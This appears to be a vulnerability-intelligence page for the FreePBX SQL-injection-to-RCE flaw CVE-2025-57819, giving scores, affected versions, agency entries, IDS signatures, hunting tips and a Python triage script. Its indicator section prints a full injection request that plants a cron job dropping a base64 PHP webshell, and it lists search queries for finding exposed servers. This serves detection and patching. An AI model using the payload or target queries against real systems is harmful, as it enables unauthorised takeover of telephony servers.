CVE-2025-57819
Published 2025-08-28
Priority: P1 (critical), CVSS 3.1 base score 9.8, vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, remediation due 2025-09-19
Exploited in the wild
EPSS: 93.29% (99.8th percentile)
FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freepbx | endpoint | < 15.0.66 | 15.0.66 |
| freepbx | endpoint | < 16.0.89 | 16.0.89 |
| freepbx | endpoint | < 17.0.3 | 17.0.3 |
| sangoma | freepbx | >= 15.0 < 15.0.66 | 15.0.66 |
| sangoma | freepbx | >= 16.0 < 16.0.89 | 16.0.89 |
| sangoma | freepbx | >= 17.0 < 17.0.3 | 17.0.3 |
Detection & IOCs (extracted from sources)
path: /var/log/asterisk/freepbx_security.log
command: GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'%20;INSERT%20INTO%20cron_jobs%20(modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)%20VALUES%20('sysadmin','{{username}}','echo%20%22{{cmd}}%22%7Cbase64%20-d%20%3E/var/www/html/{(unknown)}.php',NULL,'*%20*%20*%20*%20*',30,1,1)%20--%20
snort:
```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:15; content:"/admin/ajax.php"; fast_pattern; http.request_body; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|(?:NULL(?:\x2c|%2[cC])){2,}|(?:\x2f|%2[fF])(?:\x2a|%2[aA]).+(?:\x2a|%2[aA]).+(?:\x2f|%2[fF])|CONCAT.+SELECT|EXTRACTVALUE|UNION.+ALL)/i"; reference:url,labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/; reference:cve,2025-57819; classtype:attempted-admin; sid:2064717; rev:1;)
```
snort:
```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/admin/ajax.php|3f|"; fast_pattern; startswith; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|(?:NULL(?:\x2c|%2[cC])){2,}|(?:\x2f|%2[fF])(?:\x2a|%2[aA]).+(?:\x2a|%2[aA]).+(?:\x2f|%2[fF])|CONCAT.+SELECT|EXTRACTVALUE|UNION.+ALL)/i"; reference:url,labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/; reference:cve,2025-57819; classtype:attempted-admin; sid:2064719; rev:1;)
```
- Probe for the backdoor cleanup script dropped during 0-day exploitation by requesting /.clean.sh and matching on keywords present in the response body.
- Detect SQLi exploitation attempts against /admin/ajax.php by matching the EXTRACTVALUE-based error-based injection response pattern in the body.
- The exploit inserts a cron job into the `cron_jobs` table via SQL injection to schedule a base64-decoded PHP webshell written to /var/www/html/; monitor for unexpected rows in cron_jobs with schedule '* * * * *' and commands containing base64 decode pipes.
- The RCE payload is a self-deleting PHP webshell that emits the response header 'x_poc: CVE-2025-57819'; hunt for this header in HTTP logs as a confirmation of successful exploitation.
- Use Shodan/FOFA favicon hashes to identify exposed FreePBX instances that may be targeted.
- The Metasploit module exploits the FreePBX database user's ability to schedule cronjobs; monitor for new cron entries created by the database user (e.g., asterisk or freepbx DB user) as a post-exploitation indicator.
- The Nuclei RCE template uses a 70-second wait (timeout 80s) before fetching the dropped PHP webshell, because the payload is executed via a cron job scheduled at '* * * * *' (every minute); detection timing must account for this delay.
- The Nuclei template flow is 'http(1) || http(2) && http(3) && http(4)', meaning SQLi detection (step 1) is independent of the RCE chain (steps 2–4); operators should be aware that step 1 alone does not confirm RCE.
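The hunting points above (unexpected every-minute `cron_jobs` rows piping base64 into the web root, requests to the endpoint module of /admin/ajax.php with SQL metacharacters in `brand`, the `x_poc: CVE-2025-57819` response header, and probes for /.clean.sh) combined into one triage script. This is an added example, not code from any of the listed sources; the `cron_jobs` rows and the HTTP log line format are constructed for illustration, and the column names assumed are the ones named in the injected INSERT shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample rows exported from the FreePBX `cron_jobs` table (hypothetical data).
CRON_JOBS = [
    {"modulename": "sysadmin", "jobname": "backup",
     "command": "/usr/sbin/fwconsole backup --id=1", "schedule": "0 2 * * *"},
    {"modulename": "sysadmin", "jobname": "x",
     "command": 'echo "PLACEHOLDER_B64"|base64 -d >/var/www/html/drop.php', "schedule": "* * * * *"},
]

# Constructed sample HTTP log lines: "<method> <uri> <status> <notable response header or ->".
HTTP_LOG = [
    "GET /admin/config.php 200 -",
    "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model"
    "&template=x&model=model&brand=x%27%20%3BINSERT%20INTO%20cron_jobs 200 -",
    "GET /drop.php 200 x_poc:CVE-2025-57819",
    "GET /.clean.sh 404 -",
]

BASE64_PIPE = re.compile(r"base64\s+(-d|--decode)\b")      # base64 decode in a pipeline
WEBROOT_WRITE = re.compile(r">\s*/var/www/html/\S+\.php")   # redirect into the web root
SQL_META = re.compile(r"['\";]|--")                         # quote, semicolon or comment


def suspicious_cron_jobs(rows):
    """Jobnames whose row shows the webshell-drop pattern: every-minute schedule
    plus a base64 decode piped into a .php file under /var/www/html."""
    return [r["jobname"] for r in rows
            if r["schedule"].strip() == "* * * * *"
            and BASE64_PIPE.search(r["command"]) and WEBROOT_WRITE.search(r["command"])]


def flag_http_lines(lines):
    """Return (uri, [reasons]) for each log line matching one of the page's HTTP indicators."""
    out = []
    for line in lines:
        method, uri, status, hdr = line.split(" ", 3)
        parts = urlsplit(uri)
        q = parse_qs(parts.query)          # parse_qs percent-decodes parameter values
        reasons = []
        module = q.get("module", [""])[0].lower()
        if parts.path == "/admin/ajax.php" and "endpoint" in module \
                and any(SQL_META.search(v) for v in q.get("brand", [])):
            reasons.append("endpoint-module-sqli")
        if parts.path == "/.clean.sh":
            reasons.append("cleanup-script-probe")
        if "x_poc:CVE-2025-57819" in hdr.replace(" ", ""):
            reasons.append("webshell-response-header")
        if reasons:
            out.append((uri, reasons))
    return out
```

Run it against a real export by replacing the constructed lists with rows from the `cron_jobs` table and lines from the web server access log.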
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 10.0 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 10.0 | CRITICAL | |
VulnCheck
Sangoma FreePBX Authentication Bypass Vulnerability
vulncheck · 2025 · CVSS 10.0 · [CRITICAL] · CWE-89
Sangoma FreePBX contains an authentication bypass vulnerability due to insufficiently sanitized user-supplied data that allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution.
Affected: Sangoma FreePBX
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://x.com/Ransom_DB/status/1961308995286606082; https://www.security.nl/posting/903088/%27Hond
CISA
Sangoma FreePBX Authentication Bypass Vulnerability
cisa · 2025-08-29 · CVSS 10.0 · [CRITICAL] · CWE-89
Affected: Sangoma FreePBX
Sangoma FreePBX contains an authentication bypass vulnerability due to insufficiently sanitized user-supplied data that allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h ; https://nvd.nist.gov/vuln/detail/CVE-2025-57819
Remediation Due Date: 2025-09-19
Suricata
ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1
suricata · 2025-09-16 · CVSS 10.0 · [CRITICAL]
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:15; content:"/admin/ajax.php"; fast_pattern; http.request_body; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.
Suricata
ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2
suricata · 2025-09-16 · CVSS 10.0 · [CRITICAL]
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FreePBX ajax.php endpoint module SQL Injection Attempt (CVE-2025-57819) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/admin/ajax.php|3f|"; fast_pattern; startswith; content:"module|3d|"; content:"command|3d|"; content:"model|3d|"; content:"template|3d|"; content:"brand|3d|"; pcre:"/^[^<]*?(?:\x27|%27|-{2}|%2d%2d)?(?:(?:S(?:HOW.+(?:C(?:UR(?:DAT|TIM)E|HARACTER.+SET)|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER|SLEEP|CONCAT|CASE))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|(?:NULL(
Metasploit
FreePBX ajax.php unauthenticated SQLi to RCE
metasploit
This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89, and 17.0.3. The vulnerability lies in the /admin/ajax.php endpoint, which is accessible without authentication. Additionally, the database user created by FreePBX can schedule cronjobs, allowing remote code execution on the target system.
Nuclei
FreePBX - CVE-2025-57819 Backdoor
nuclei · CVSS 10.0 · [CRITICAL]
FreePBX backdoor cleanup script used in 0-day exploitation of CVE-2025-57819 was detected.
Template:
```yaml
id: freepbx-cleanup-backdoor

info:
  name: FreePBX - CVE-2025-57819 Backdoor
  severity: high
  author: darses
  description: |
    FreePBX backdoor cleanup script used in 0-day exploitation of CVE-2025-57819 was detected.
  metadata:
    verified: true
    max-request: 1
    vendor: sangoma
    product: freepbx
    shodan-query:
      - http.title:"FreePBX"
      - http.favicon.hash:-1908328911
      - http.favicon.hash:1574423538
    fofa-query:
      - title="FreePBX"
      - icon_hash="-1908328911"
      - icon_hash="1574423538"
  reference:
    - https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203
  tags: backdoor,sangoma,freepbx,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/.clea
```
Nuclei
FreePBX - Remote Code Execution
nuclei · CVSS 10.0 · [CRITICAL]
FreePBX 15, 16, and 17 contain a remote code execution caused by insufficiently sanitized user-supplied data in endpoints, letting unauthenticated attackers manipulate the database and execute code remotely; the exploit requires no authentication.
Template:
```yaml
id: CVE-2025-57819

info:
  name: FreePBX - Remote Code Execution
  author: watchtowr,pussycat0x,DhiyaneshDk
  severity: critical
  description: |
    FreePBX 15, 16, and 17 contain a remote code execution caused by insufficiently sanitized user-supplied data in endpoints, letting unauthenticated attackers manipulate the database and execute code remotely, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can manipulate database records through SQL injection and achieve remote code execution thro
```
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
Recorded Future
August 2025 CVE Landscape
blogs_recorded_future · CVSS 8.8 · [HIGH]
In August 2025, Recorded Future’s Insikt Group® identified eighteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the 22 identified in July.
However, the number of Very Critical vulnerabilities has remained the same (16) compared to July. These vulnerabilities have affected the following vendors: Trend Micro, WinRAR, N-able, Cisco, Apple, Citrix, FreePBX, Git, Microsoft, D-Link, and Fortinet.
August was dominated by Citrix and D-Link flaws, which represented six of the eighteen vulnerabilities. Threat actors actively exploited Citrix NetScaler ADC, NetScaler Gateway, and Citrix Session Recording products, as well as D-Link DNR-322L and DCS-2530L routers.
Recorded Future Insikt Group’s CVE Findings fro
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
References:
- https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203
- https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-57819
Timeline:
- 2025-08-28: Published
- 2025-08-29: Added to CISA KEV
- Exploited in the wild